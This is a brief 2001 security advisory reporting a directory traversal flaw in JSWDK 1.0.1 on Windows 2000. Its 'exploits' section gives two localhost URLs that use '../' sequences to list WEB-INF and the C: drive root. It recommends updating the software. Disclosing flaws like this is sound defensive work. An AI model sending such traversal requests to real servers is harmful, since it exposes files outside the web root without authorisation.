CHINANSL Security Advisory(CSA-200106)

2001-03-29T00:00:00
ID SECURITYVULNS:DOC:1439
Type securityvulns
Reporter Securityvulns
Modified 2001-03-29T00:00:00

Description

Topic: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability

vulnerable: Microsoft Win2000 ЎЎЎЎ+JSWDK1.0.1 maybe for other operating system also.

discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope.

exploits: http://localhost:8080/examples//WEB-INF/ listing /WEB-INF/ Directory .

http://localhost:8080/../examples//WEB-INF/../../../../../ if JSWDK installd in c:\ the question will listing c:\ all file and directory.

solution: Update JSWDK

Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use.

CHINANSL Security Team <lovehacker@chinansl.com> CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)